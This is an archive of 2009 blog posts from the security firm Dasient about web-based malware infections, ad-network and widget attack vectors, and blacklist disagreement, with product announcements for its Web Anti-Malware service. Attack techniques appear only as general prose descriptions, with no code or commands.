Interesting story in the media late last week, with several articles detailing a newly discovered vulnerability created by the origin policies for third-party Flash objects embedded on sites. This vulnerability is especially serious, as it's structural in nature -- meaning that it stems from the way this third-party content is actually embedded in sites, rather than from a software hole that can be patched. There is no simple solution for closing this vulnerability.

As the web grows increasingly interdependent -- with web companies and site owners sourcing in more and more content and applications from each other and from users -- these structural vulnerabilities will only continue to grow in variety and number. At present, they include sourcing in third-party content or applications; enabling users to add content like comments, links, photos, and other files; and employing syndicated ad networks, among other things. These vulnerabilities are already relatively widespread: For example, 66 percent of the top 500 sites in the US run ads, 47 percent of the top 100 accept user-generated content, and 75 percent of the top 100 newspapers in the US enable user comments.

These vulnerabilities open sites up to a number of potential exploits, not least of which is being turned into a delivery vehicle for malware, wherein a site inadvertently infects some or all of its visitors with malicious software. This can in turn trigger losses in traffic, reputation, and revenue, as visitors discover the infections and as the site is evaluated by the search engines, browsers, and AV providers that blacklist dangerous sites. And since these vulnerabilities are structural, there's often no way to "close" them. In other words, there's nothing site owners can do to guarantee that they won't be exploited, other than abandon things like third-party content and ad networks altogether (which, for most sites, isn't much of an option).

So what can site owners who rely on elements of the interdependent web do to reduce the likelihood that their site will be compromised? At Dasient, we believe that a fast, scalable scanning and diagnostic service is an increasingly crucial part of any defense strategy. In the last few months alone, we've seen a significant increase in the number of sites that are being compromised and turned into delivery vehicles for malware. Now more than ever, site owners need to be able to quickly locate and address any bad code that finds its way onto their sites.

To learn more about how Dasient's Web Anti-Malware service might be able to help you, check out this page.

For malware attacks, WAFs need to be complemented by WAM

2009-11-05T08:26:00.000-08:00

Dmitry Evteev of Positive Technologies recently posted about a method to bypass web application firewalls (like mod-security) to mount SQL injection attacks.

While web application firewalls (or WAFs) play an important role in a defense-in-depth strategy, the post highlights why businesses cannot rely solely on preventative technologies like WAFs to secure their websites from attacks, particularly web-based malware attacks.

For one, as the article and the comments demonstrate, WAFs require configuration and ongoing maintenance of software and rulesets to prevent the latest attacks. If the WAF is running out-of-date software or rulesets, or if the administrator has improperly configured the device, it will not be able to prevent attacks like the one detailed in Dmitry's post.

Second, there will always be new types of attacks and new vulnerabilities that attackers can exploit to inject malicious code onto websites. WAFs can enforce security policies based on signatures of known attacks, but they cannot necessarily prevent "zero-day" attacks that look like normal traffic.

Finally, not all malware attacks exploit web application vulnerabilities to place malware on websites. For example, the Gumblar attack from earlier this year relied on compromised FTP credentials to infect sites. Recent malvertising attacks have taken advantage of syndicated ad networks to display malicious ads on legitimate publisher sites. A recent study by Google discovered that "the [malicious] code was often contained in those parts of the website not designed or controlled by the website owner, such as banner adverts and widgets... Widgets are small programs that may, for example, display a calendar on a webpage or a web traffic counter. These are often downloaded from third-party sites."

Security professional tend to invest heavily in "preventative" solutions, but underinvest in technologies to detect and remediate problems when they (inevitably) occur. WAFs can help "raise the bar," making it more difficult for attackers to infect a legitimate website. However, given that attackers can circumvent preventative technologies like WAFs, businesses cannot rely on WAFs alone to secure themselves from malware attacks. To provide true defense-in-depth, WAFs must be complemented by services like Dasient Web Anti-Malware (WAM) that automatically monitor websites for infections and remediate them when they occur.

New Q3'09 malware data, and the Dasient Infection Library

2009-10-27T08:00:00.000-07:00

Ed. Note: The data in this post is drawn primarily from Dasient's proprietary malware analysis platform, which gathers data on web-based malware attacks from across the web and in the last six months has been used to help tens of thousands of site owners address their web-based malware issues. This is the first in a series of regular reports on these trends.

As we've discussed in this space before, we are seeing a fundamental shift in how malware is being distributed: Attackers are focusing more than ever on compromising legitimate websites and using them to distribute malware. As a result, more and more sites are feeling the effects of web-based malware infection, which can include loss of traffic, decline in revenue, and damage to brand equity.

This trend is underlined by the data we've gathered on the third quarter of 2009, which saw significant activity on the web-based malware front. During that span, Dasient identified more than 52,000 web-based malware infections, making for a total of more than 72,000 unique malware infections identified and catalogued since our malware analysis platform launched.

Based on the telemetry data we've gathered from the web, we estimate that more than 640,000 sites and approximately 5.8 million pages were infected in the quarter. This is a substantial increase from data published by Microsoft in April 2009, which pegged the number of infected pages per quarter at a little more than 3 million. This increased activity is also reflected in the rapid growth of the blacklists maintained by search engines, browsers, and anti-virus software companies. The Google blacklist alone has more than doubled in the last year, and at certain points has been adding 40,000 new sites per week.

This shift has been accelerated by the fact that using legitimate sites as a delivery method enables attackers to infect large numbers of endpoints at once, and by the trend toward increasing complexity in and interoperability between websites and web applications (which is in turn opening up more and more attack surfaces).

Substantial portions of sites being infected

While it often takes only a couple of infected pages to harm users or land a site on one of the many blacklists, our research suggests that when sites are infected, the bad code is installed on a significant portion of the pages on those sites. In Q3'09, the infections on newly compromised sites of 10 pages or more spread to an average of 19% of those sites' pages.

This number is significant for a couple of reasons. For one, the greater the percentage of a site that's infected, the greater the chances are that the site will spread malware to users or be flagged by a blacklist provider. For another, modern web-based malware infections are frequently complex and heavily obfuscated, making it a challenge even for experienced webmasters to identify all the bad code on the site and remove it. The more infected pages there are on the site, the longer it can take to address the infection. And if the site has already been blacklisted (which is often the case), then the site will take a hit in traffic, reputation, and revenue with each day that passes during the cleanup and blacklist appeal process.

High reinfection rate

Another trend worth noting from Q3 is the high reinfection rate for sites, which came in at 39.6%. There are a number of factors that could contribute to a high reinfection rate, including the tendency for attackers to look for attack vectors common to large numbers of sites and then develop automated attack scripts that will repeatedly seek out those vectors and exploit them.

The sheer number of available attack vectors likely also plays a part. Common attack vectors include compromised FTP credentials, server-side vulnerabilities, unpatched or unknown web application vulnerabilities, and syndicated ad networks serving malicious ads. With attackers embracing scale and automation, and with so many ways for even well-secured sites to be compromised, it's becoming more and more important for site owners to employ tools that can help them regularly monitor their sites for infection and quickly address any issues that arise.

New attack techniques

As you can see in the graph below, the vast majority of the web-based malware attacks in Q3 could be classified as JavaScript (54.8%) and iFrame (37.1%) attacks, with "other" attacks accounting for only 8.1%.

One of the challenging things about trying to protect sites from the threat of web-based malware is that the attacks often evolve very quickly and make use of a number of obfuscation techniques to evade traditional malware scanners. We saw plenty of this activity in Q3, with some notable recent examples being dynamically generating the SRC attribute in iFrames to foil scanners that look at SRC attributes; using partially or fully encoded URLs to frustrate scanners that look for regular expressions; and adding phrases like "analytics-google" to malicious code to fool webmasters into thinking the code is legitimate.

Dasient to open up web-based malware Infection Library

The Dasient Web-Anti Malware (WAM) service regularly monitors our customers' sites for signs of a web-based malware infection. When an infection is detected, it notifies the customer immediately, providing full diagnostic information on the infection. It can also automatically strip out the bad code from infected pages before they're served to the site's users -- keeping those users safe and keeping the site off the blacklist. We're proud to be able to provide this service to our customers, and have received great feedback since launching earlier this year.

But as the threat of web-based malware continues to grow, one of the things we're hearing from the web, security, and IT professionals we work with is that they need more information to help them keep track of the threat and ensure that they have the tools they need to address it. With that in mind, we will now start providing these professionals with a view into the Dasient Infection Library, which in just a few months has accumulated data on more than 70,000 different web-based malware infections.

To start, we'll be providing information on the top 10 web-based malware attacks for the week, as well as some other basic trend information on the latest attacks. We'll also be publishing relatively new infections that our platform finds to a dedicated Twitter feed. We hope to expand the view we offer into our Infection Library in the future, and are looking forward to your feedback on the kinds of data and functionality you'd find useful.

If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your business, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed at http://twitter.com/dasient for all the latest in web-based malware and general security news.

More industry attention on web-based malware

2009-10-13T14:55:00.001-07:00

Yesterday, Google announced that it plans to start providing owners of malware-infected sites with samples of the bad code that its scanners have uncovered. This new functionality is launching as an experimental feature in Webmaster Tools, and as I mentioned in the talk I gave at Google this past July, we're excited to be working in concert with Google and others to tackle the threat of web-based malware and help make the web a safer place overall.

This announcement clearly underlines the growing need for this kind of information and for new tools to help site owners protect themselves and their users. As we've mentioned before in this space, millions of legitimate webpages are infected with web-based malware every month, and the size of the blacklists maintained by search engines, browsers, and AV providers continues to grow.

Another issue the announcement raises is how difficult it can be for businesses whose sites have been infected to locate the source of the infections and address them (especially since the malicious code is sometimes heavily obscured). And since businesses often don't discover these infections until their sites have been blacklisted, they're taking a hit in traffic, revenue, and reputation with every hour that passes as they try to solve the problem.

We've helped tens of thousands of site owners deal with web-based malware infections in the last eight months -- providing not just snippets, but also full, regular site scans, immediate infection alerts, and automatic remediation tools -- and we've seen firsthand how frustrating these infections can be for them, and how helpful services like Dasient WAM can be.

If you're concerned about web-based malware infections and the impact they can have on your business, sign up for Dasient's monitoring service, which can identify infections and alert you before your site ends up on one of the blacklists. We also encourage you to try out our free, open-source server plugin, which will automatically block any malicious code we detect from being served to users -- helping you keep those users safe and keep your site off the blacklists.

Dasient details new attack @ Cyber Security East

2009-09-28T15:53:00.001-07:00

Late last week I gave a talk at the Cyber Security East Conference in Washington, DC. Some of the other speakers included Robert Lentz (Deputy Assistant Secretary of Defense), Dr. Eric Cole (Chief Scientist of Lockheed Martin), and Robert Carey (Chief Information Officer, Department of the Navy). There was a lot of interesting and useful discussion, and I was glad to be able to contribute to the event.

In my talk, I reviewed the fundamental shift we've seen in the way malware is spreading, focusing on the 600% increase in web-based malware in the last two years. These attacks -- in which legitimate sites are compromised and turned into delivery vehicles for malware -- are impacting more than a million webpages per month, and in turn more and more legitimate sites are being blacklisted by major search engines, browsers, and AV companies.

I also shared a few examples of how web-based malware attacks are growing more sophisticated, based on data we've gathered in the last year using our proprietary malware analysis platform. As you may know, some web-based malware attacks can be attributed to a single injection of an iFrame or JavaScript code snippet, with a relatively obvious malicious domain in the SRC of the iFrame. Others employ heavily obfuscated JavaScript that can often be hundreds of characters long, and as such can be more difficult to spot or remove from an infected site -- but they still use a single injection point.

We are now starting to see attackers insert code via multiple injection points, to further obfuscate the bad code and make it more difficult for webmasters and traditional scans to detect. In the screen below is an example of this kind of attack that I presented last week:

Note that the attacker has injected JavaScript here, but it is not obfuscated, and it doesn't appear to point to a malicious domain. Hence, anyone who does a simple check for malicious domains may be easily fooled into thinking that the JavaScript is innocuous. The reality is quite different: The call to "getElementById" in the JavaScript reaches into another part of the document (where the first injection took place) to retrieve and clarify the malicious domain. Once the domain is decoded (in the second injection), the attacker's domain is revealed to be the source of a malicious iFrame.

This new attack makes it clear that the purveyors of web-based malware are actively looking for ways around malware scans, and it underlines the importance of going above and beyond signature-based analysis in the battle against this threat. For example, the Dasient WAM malware-analysis platform was able to proactively capture this new multiple-injection attack in no small part because of its strengths in behavioral analysis. We believe that as the web becomes more sophisticated and as attackers continue to embrace new, increasingly automated attack vectors, businesses on the web will need to deploy protections that work at web speed and web scale to keep themselves safe.

To learn more about how Dasient WAM can help you protect your site, check out our product overview.

Dasient @ HostingCon 2009

2009-08-19T10:45:00.000-07:00

Readers of this blog will know that the Dasient team was at HostingCon 2009 in Washington DC last week. The show was great -- busy, but very engaging. We had a booth in the exhibit hall, and hosted a party for some of the show's attendees. Neil gave a talk on the rising threat of web-based malware in the "Emerging Trends" track, and we launched a new open source tool called Mod Anti-Malware Lite to help web hosts, site owners, and developers protect themselves. We were also named one of the five "must see" companies at the show by Web Host Magazine.

But, without question, the most rewarding part of the experience was the opportunity to interact with so many people from the web hosting community. We learned a lot about the challenges that web hosts of all sizes are facing on the security front, and talked to several companies whose customers had been infected with web-based malware and / or blacklisted in recent months (one company had seen more than a quarter of its domains infected by Gumblar). We also got a lot of great feedback on Dasient WAM and the ways it's helping hosts address these threats.

For those of you we missed at the show, be sure to check out our new partner center, where you can sign your customer domains up for free blacklist monitoring, download Mod Anti-Malware Lite, and more. And for the rest of you, check out our pics from the event below!

Dasient launches Web Anti-Malware Lite

2009-08-11T05:55:00.000-07:00

The Dasient team is at HostingCon 2009 this week, and today we've made a few announcements that we're really excited about. Here's an excerpt from the release we put out this morning:

Dasient Releases Free Open-Source Web Anti-Malware Technology

Test version of Dasient WAM remediation technology enables site owners and web hosts to keep their sites from infecting users in the event of a malware infection

Dasient also launches partner center and announces new distribution partnerships with web hosting providers

WASHINGTON DC - August 11, 2009 - Today at HostingCon 2009, Dasient launched Mod Anti-Malware Lite, an open source version of its Web Anti-Malware (WAM) remediation technology. Mod Anti-Malware Lite is an Apache server module that will help site owners, web hosts, and developers protect themselves against the effects of web-based attacks that can compromise their sites and spread malware to their users. Mod Anti-Malware Lite will be made available today at www.dasient.com/partners and www.sourceforge.net.

"Every day, thousands of legitimate websites are infected with malicious code, and the speed, scale, and complexity of these attacks makes it difficult for website owners to identify and address the resulting infections," said Dr. Neil Daswani, one of Dasient's three co-founders. "Now more than ever it's important for site owners to deploy defenses that can operate at the scale and speed required to deal with the problem."

The most immediate result of web malware infection is blacklisting by search engines like Google and Yahoo; browsers like Internet Explorer, Firefox, and Chrome; and desktop anti-virus providers like Norton and McAfee. Using Dasient's Web-Anti Malware service can help sites stay off these blacklists, all of which can have a significant impact on site traffic, reputation, and revenue. Dasient WAM is the only web anti-malware service on the market that can monitor, automatically identify, and quarantine malware on websites before it can infect visitors and cause a loss of traffic, reputation, and revenue.

Dasient is making Mod Anti-Malware Lite available as open source so that web hosts, site owners, and developers can test the Dasient WAM technology on their sites and explore different uses of the technology. When used in conjunction with the Dasient WAM monitoring and diagnostic service, the module will prevent any page that's been infected with malware from being served to users. Anyone who downloads and installs Mod Anti-Malware Lite will be granted a limited free trial of the Dasient WAM monitoring and diagnostic service, to be used in conjunction with the module.

Compared with the technology offered in Mod Anti-Malware Lite, the remediation technology in the premium service takes things a step further, removing any dangerous code but still serving the rest of the page to users, so site owners both protect their users from infection and stay open for business.

Also today, Dasient is launching a new partner center at www.dasient.com/partners. The partner center is designed to be a resource for web hosting providers, enabling them to quickly and easily sign their customer domains up for free blacklist monitoring, download Mod Anti-Malware Lite, and more.

Dasient is also happy to announce new distribution partnerships with five web hosting providers: Consolidated, Vexxhost, Ultrahosting, and Nerds on Site in North America and Diadem Technologies in India. These partners will be integrating Dasient WAM into their product platforms in the coming months, selling the product to their customers and sharing revenue with Dasient.

If you'd like to learn more about the Dasient WAM service, check out our product overview. If you'd like to download Mod Anti-Malware Lite and get started right away, head over to the new partner center.

And if you're at the show, be sure to catch the session by our own Neil Daswani at 4:00 pm today in the "Emerging Trends" track at the conference. Neil will be discussing the rising threat of web-based malware, and what web hosts of all sizes can do to protect themselves and their customers. Also be sure to swing by our booth for a demo of the Dasient WAM technology or to sign up for free blacklist monitoring in our new partner center. We're in booth 312 -- see you there!

Dasient Co-Founder Neil Daswani Gives Talk At Google

2009-08-06T09:51:00.000-07:00

Last week, Neil was invited by Google engineer David Turner to give a talk at Google on "Mitigating Web-Based Malware Attacks." In the talk, Neil discussed the problem of web-based malware, and the ways we can all work together as a community to address it. The full video of the talk has been posted on YouTube:

Enjoy!

How does a web page harm thee? Let me count the ways....

2009-07-22T11:01:00.000-07:00

As the web grows and diversifies, so do the number of ways in which web pages can harm users (for example). To help counter this threat, Google, Norton, and McAfee maintain "blacklists" that warn users away from potentially unsafe webpages. But what exactly does it mean to get blacklisted by these services? Do the lists agree on which sites are harmful?

When analyzing a blacklist, the primary fact to keep in mind is that the term "bad" is not well defined. As such, each list operates under different criteria. Google, for example, focuses on technical threats such as drive-by downloads. McAfee and Norton take a broader view, and will flag a site based on things like "annoyance factors" or "excessive popups." McAfee also signs up for any mailing lists it finds and records the amount of spam generated. Google limits itself to a binary response marking a site as potentially harmful (e.g., "This site may harm your computer") or not, while McAfee and Norton label websites as "Safe," "Caution," "Warning," or "Untested."

Given these divergent criteria, the first thing that is immediately apparent is that it would be much too simplistic to call all blacklisted sites "malicious," while calling all non-blacklisted sites "safe." To see how similar or different these blacklists are in practice, we took a set of relatively popular domains on the Internet and queried all three lists.

Of the sites that were flagged by at least one of the blacklists:

57% were marked as potentially harmful or "Warning," with the other 43% marked as "Caution."

Google flagged 5.2% with a "This site may harm your computer" label.

Norton flagged 16.3% of the sites with a rating of "Warning," and another 14.4% with a rating of "Caution."

McAfee flagged 38.6% of the sites with a rating of "Warning," and another 32% with a rating of "Caution."

Per the statistics above, Google's list was by far the smallest, reflecting its focus on technical threats. Norton had far more "untested" sites than McAfee, partially explaining Norton's lower numbers.

When we compare which sites were blacklisted, however, the results become far more interesting. Of the sites that Google blacklisted:

Norton labeled less than half with "Warning," half with "Safe," and the remaining ones as "Untested." None were labled with "Caution."

McAfee labeled a quarter with "Warning," a quarter were "Untested," and the remaining half were safe. None were labled with "Caution."

McAfee's users lodged complaints about more than half of the sites.

Norton and McAfee's blacklists also didn't agree with each other often. Of the sites flagged between them, only 4% were on both lists. Amazingly, the overlap between all three lists was less than 1%.

Of the sites flagged "Warning" or "Harmful" by at least one list, 61%
were flagged only by McAfee. Only 1% were flagged by all three lists.

These discrepancies shouldn't be surprising, given the fact that the lists employ different criteria and techniques for evaluating sites. But there are also deeper reasons for the lack of overlap: For one thing, the frequency and timing of testing can have a significant impact on the rating a site receives -- if a site is compromised after it's tested by a service, and that service doesn't test it again for another day, week, or even month, that site could end up infecting a significant number of its users while still being marked as "safe" by the service. For another, the diagnostics employed by these services aren't necessarily infallible -- web-based malware is sometimes masked to prevent its detection by some testing services.

So what does all this mean for protecting your business? How should you deal with the fact that there are so many blacklists out there, testing your site on several different criteria and with varying levels of effectiveness? At Dasient, we believe the answer is being proactive about monitoring and protecting your site from web-based malware. To learn how we can help you do that, click http://wam.dasient.com.

Attackers infect websites via ad networks, widgets

2009-07-07T10:23:00.000-07:00

According to reports on Twitter as well as on ZDNet over the weekend, visitors to several high-profile websites were blocked from accessing parts of the sites because an advertising partner, Eyewonder, suffered a malware attack.

Malicious advertisements are increasingly being used by attackers as a vector for distributing malware via legitimate sites. In this case, what happens is that the malicious code that the website ends up serving to users is being sourced in from an advertising partner. The website itself has not been compromised by attackers -- rather, the ad network used by the site has been compromised. Attackers often use malicious ads to achieve scale and avoid detection. It would have been difficult for the attackers to infect a large number of high-profile websites directly; instead, they were able to leverage the trusted relationship between the websites and their ad network to get malicious content (in this case an ad) served to the sites' end users. In some cases, Dasient has added certain ad networks to its internal blacklist to inform its customers where there is a risk that ads may result in infecting their users.

In addition to malware coming in through ads, we have also seen cases where malicious code comes into a website via content mash-ups or third-party widgets. For example, third-party widgets such as traffic counters have been used to infect websites (see section 4.4 of "The Ghost in the Browser"). We have spoken to website owners who explained that their sites were infected not through attackers exploiting a vulnerability in the website, but because they included a plug-in or widget that ended up being malicious. In some cases, the widget is benign for a period of time (even years), but then drastically changes behavior to become malicious (either because the widget provider was itself malicious or, more likely, because the widget provider's servers were hacked).

Attackers will continue to find network and web application vulnerabilities in websites that they can exploit to directly plant malicious code. However, it is clear from the Eyewonder incident that the attackers will also seek ways of exploiting the trusted relationships between websites and their third-party advertising or content partners to create the same effect. The nature of the open web encourages websites to mash up best-of-breed content (and ads) from various sources. To reduce risk, it is important for websites to perform due diligence on all third-party content and ad providers, as well as employ automated detection and remediation services.

Introducing Dasient Web Anti-Malware (WAM)

2009-06-16T06:04:00.000-07:00

posted by Neil Daswani, Ameet Ranadive, and Shariq Rizvi,
Co-Founders, Dasient

If you've been following our blog, you'll know that we've been talking quite a bit about the latest security threats on the web. One of the threats we've been focusing on specifically is web-based malware. This kind of attack -- in which hackers compromise a legitimate site and turn it into a delivery vehicle for drive-by malware downloads -- has long been regarded as an emerging threat.

But one look at the numbers makes it clear that this threat has officially arrived: In the last two years, there's been a 600% increase in the number of malware-infected webpages, and 80% of those pages are legitimate. Google first reported the problem of malware-infected pages exploding from April 2007 to January 2008. Microsoft estimated in an April 2009 report that the total number of legitimate webpages being compromised per month is more than 1 million. And now that search engines like Google and Yahoo; browsers like IE8, Firefox, and Chrome; and desktop AV providers like Norton and McAfee are blacklisting compromised sites, those sites are seeing double-digit losses in traffic and revenue and taking significant hits to their reputation.

Those are just some of the reasons we're proud to be opening up our Dasient Web Anti-Malware service to a broader audience today. Dasient Web Anti-Malware -- or "WAM," as we like to call it -- is the world's first complete anti-malware solution for websites. Dasient WAM monitors, automatically identifies, and quarantines malware on websites, before those sites suffer significant losses in traffic, revenue, and reputation.

We're making the monitoring and diagnostic elements of WAM openly available in public beta today, and making the quarantining element available in private beta. WAM is available both to site owners and to web hosting providers interested in offering their customers protection against web-based malware. If you want to learn more, jump down to the full text of our news release, which we've included below. If you're ready to get started right away, head here to sign up for free blacklist monitoring for your site.

We're excited to be bringing these necessary protections to the web, and are looking forward to your feedback. Stay tuned to this space for more news on Dasient WAM and further insights on the development of new web-based threats.

Here is the press release:

Dasient Introduces First Web Anti-Malware Service

Addresses Growing Need for Protection From New Web-Based Attacks

PALO ALTO, June 16, 2009 – Dasient today introduced the industry's first service to protect companies against a fast-growing class of web-based attacks that compromise legitimate websites and then use them to spread malware to the sites' visitors. Dasient's new Web Anti-Malware (WAM) service continually monitors websites, diagnoses any infections, and helps businesses address the infections, before the sites suffer significant losses in traffic, revenue, and reputation.

"In the last two years, we've seen a fundamental shift in the way malware is spread," said Dasient co-founder Dr. Neil Daswani. "Hackers are using highly automated and mutable attacks to turn websites into delivery vehicles for malicious software. This is a web problem at its core, and it requires a solution that can function at web speed and web scale. That's exactly what we had in mind when we designed the Dasient WAM service."

Sharp Increase in Malware-Infected Webpages

Each day, thousands of legitimate websites are infected with malicious code, often without their knowledge. The speed, scale, and complexity of these attacks makes it extremely difficult for website owners to identify and fix the resulting infections, and in some cases to even know they've occurred.

The most immediate result of web malware infection is blacklisting by search engines like Google and Yahoo; browsers like Internet Explorer, Firefox, and Chrome; and desktop anti-virus providers like Norton and McAfee. When blacklisted, a website's visitors are redirected to a warning that the site they're about to visit might be dangerous. In many cases, being blacklisted causes a sharp drop in traffic to the site, depriving the site owner of advertising or e-commerce revenue, damaging the site's brand, and spurring additional support costs.

Dasient Identifies and Contains Malware That Can Infect Site Visitors

Today Dasient is announcing the following updates to its patent-pending Web Anti-Malware service, which has been in alpha testing with thousands of websites since early this year:

Free Blacklist Monitoring: Regularly monitors blacklists from search engines, browsers, and desktop anti-virus companies and provides customers with instant alerts if they've been flagged by those providers. The WAM Blacklist Monitoring service is now in public beta, and is available for free to direct customers and web hosting providers.
Premium Monitoring and Diagnosis: Continuously monitors customer websites for malicious code that can be distributed by web applications, user-generated content, third-party widgets, advertisements, and other vulnerable site elements. When an infection is identified, customers are notified and provided with detailed diagnostic information, including all malicious source code and infected URLs. The WAM Premium Monitoring service is now in public beta, and is available on a subscription basis to direct customers and web hosting providers.
Quarantining: Used in conjunction with the Premium Monitoring service, Dasient's quarantining technology automatically contains infections as soon as they're diagnosed, serving the webpages in question but not the malicious code. Quarantining prevents the site from spreading malware broadly to its visitors and keeps it from being flagged by blacklist providers. The WAM Quarantining service is now in private beta, and direct customers and web hosting providers can sign up to join the beta on the Dasient site.

The Dasient WAM monitoring and diagnostic services are built on a set of behavioral analysis technologies that continually crawl customer sites and the web, identifying new web-based malware infections. The monitoring and diagnostic tools are provided to customers as a web service, and the quarantining technology is made available as a web server module that can be installed by customers or web hosting providers.

More information about the Dasient WAM service and pricing can be found at www.dasient.com.

About Dasient

Dasient is an Internet security company that protects businesses from web-based malware attacks. It is the first to develop a complete Web Anti-Malware service that can monitor, automatically identify, and quarantine malware on websites before it can infect visitors and cause a loss of traffic, reputation, and revenue. Dasient was founded by former Google engineers Neil Daswani and Shariq Rizvi and former McKinsey strategy consultant Ameet Ranadive. They are backed by a group of seed investors who also invested in VeriSign, Citrix, Twitter, Digg, Tumbleweed, Finjan, and more. More information about Dasient can be found at www.dasient.com.

Obama Gets Serious About Cybersecurity

2009-06-02T09:06:00.000-07:00

Late last week, President Obama laid out the White House cybersecurity policy, after a 60-day "clean slate" review. The principles he laid out in his policy (including net neutrality, the necessity to collaborate with the private sector, the importance of protecting privacy, and the need to invest in R & D) have a lot of merit, and I am hopeful that the details that will be fleshed out in the coming months will support them. I have also been glad to see that the President has committed billions of taxpayer dollars behind his principles. My only remaining hope is that these dollars find their way to people and places that can actually help.

Traditional defense contractors have done an amazing job of building systems that have helped us defend in the physical world. That said, the New York Times has reported that cybersecurity is a fairly new area to such contractors. Universities, along with many smaller private sector companies, are where much of the technical expertise lies. In addition, in my past experience at Google, I learned that there is a big difference between simply having security expertise and incorporating that security expertise into large-scale, automated systems that can defend large parts of the Internet at a time.

My hope indeed is that taxpayer cybersecurity dollars go toward building large-scale, automated defense systems that can defend large parts of the Internet at a time. Employing large numbers of human "hacker soldiers" is not an approach that can work and scale up against automated attack systems that include million-machine botnets and malware variant generators that produced more malware in 2007 than the world saw in the twenty years prior to that. The nature of web security has changed, and our defense strategies need to change with it -- at the very least, our defenses need to work at web speed and web scale.

I am thrilled that the Obama administration seems to be taking a more aggressive approach to cybersecurity than any previous administration, and over the next few years I look forward to working together with businesses, universities, and (now more than ever) the government to help the Internet continue to grow as a platform that enables us to safely communicate, collaborate, and conduct commerce.

Sincerely,

Neil Daswani, PhD
http://www.dasient.com
http://www.neildaswani.com

Web-Based Malware Attacks at an All-Time High

2009-05-27T12:06:00.001-07:00

Over the past couple weeks, there has been more web-based malware activity than in any previous similar period this year. The size of Google malware blacklist, which is used to mark sites with a "This site may harm your computer" annotation in their search results, exceeded 200,000 sites for the first time last week, reaching an all-time high of 229,980 today. This increase was due in part due to the rapid propagation of a drive-by-download virus named Gumblar. Compromising legitimate sites to serve malware to unsuspecting users has long been regarded as an emerging trend, but numbers like these make it clear that this attack vector is already a significant threat -- and as web applications become more and more sophisticated, the attack surface for this vector will only increase in size. Existing solutions have so far not been able to keep pace with this fast-moving threat, and new solutions may be required.

-- Neil
http://www.neildaswani.com

Cybersecurity, a matter of national security, broader than combating cyberspies

2009-04-10T10:05:00.000-07:00

The Wall St. Journal published an interesting article yesterday about cyberspies from Russia and China installing malware on the US electricity grid. The malware is currently benign. However, the fear among national security officials is that the malware could be activated during a crisis or war and disrupt the US electricity grid.

Cybersecurity is truly a matter of national security. This article highlights the direct threat of cyberspies who may try to disrupt our national infrastructure. However, equally risky is the threat of cybercriminals who, if unchecked, will disrupt commerce and advertising on the Internet. By undermining consumers' and businesses' confidence in the Internet, cybercriminals will erode the progress that we have achieved over the last 10-15 years with conducting business online. This will ultimately hurt the US (and global) economy, at a time when the economy does not need another reason to be down. Thus, in order to maintain national security, the government should address both cybercriminal activity (which does not necessarily target government assets), in addition to locking down government infrastructure (like the electricity grid).

Register.com a victim of DDOS attack

2009-04-06T08:54:00.000-07:00

The Washington Post's Brian Krebs reports that web host and domain name registrar Register.com was the victim of a "target of a sustained attack this week, disrupting service for thousands of customers." The attack was a distributed denial of service (DDOS) attack, launched by a botnet of hundreds or thousands of compromised PCs, which caused a 3-hour outage for Register.com last week. It appears that Register.com has taken steps to resolve the problem, but in the process, they unfortunately lost some business from their customers. Web hosts and registrars like Register.com are often a target of hackers that seek to achieve economies of scale in their attacks. It is very important that web hosting providers, an important group in the Internet infrastructure ecosystem, maintain high security standards to protect themselves and their customers.

Internet Security covered in 60 Minutes

2009-03-31T10:13:00.000-07:00

Last Sunday, 60 Minutes, a news program on CBS, reported a story about Internet security and cybercrime. The program had some interesting stories and stats, namely:

The hackers are busy: According to Symantec, "the hackers are inventing up to 15,000 new infections every day, designed specifically to get around the latest anti-virus protections."
1 in 4 Americans affected by Internet viruses: "But tens of millions of people have--one if four Americans, according to recent reports, as the hackers get more and more sophisticated."
Fame and fortune for the hackers: "A single hacker can make $30,000 a month and be championed in local newspapers."
Is the Internet in trouble? "Would you make the statement, 'The Internet in trouble?'" Stahl asked Jonathan Zittrain, Harvard Professor and co-founder of StopBadware.org. "Yes, without hesitation," Zittrain replied.

It's great that mainstream media is raising public awareness of these problems!

Cybercrime more lucrative than the global drug business

2009-03-27T10:36:00.000-07:00

AT&T's Chief Security Officer, Ed Amoroso, testified to Congress recently about the size and scope of global cybercriminal activity. In his testimony, he says, "Last year the FBI announced that revenues from cyber-crime, for the first time ever, exceeded drug trafficking as the most lucrative illegal global business, estimated at reaping more than $1 trillion annually in illicit profits."

The primary activity he warns Congress about is the threat of cyber-warfare. An example of this is where criminals or terrorists seize control of a large number of PCs via a botnet, and use those nodes to launch a large-scale distributed denial of service (DDOS) attack against US interests. He cites the example of Estonia, where 2 years ago a large-scale cyber attack produced catastrophic results: "The entire country was disconnected from the Internet."

Certainly, DDOS attacks, botnets and cyber-warfare are among the most dangerous cyber-security threats to the US and to the Internet as a whole. What is even more alarming is the massive scale and scope of cybercriminal activity as a whole: $1 trillion, larger than even the global drug trade. It will take significant effort and coordination between governments and the private sector to address these threats. We at Dasient have already joined this effort. Look for future announcements from us about how we are addressing the growing threat of cybercrime.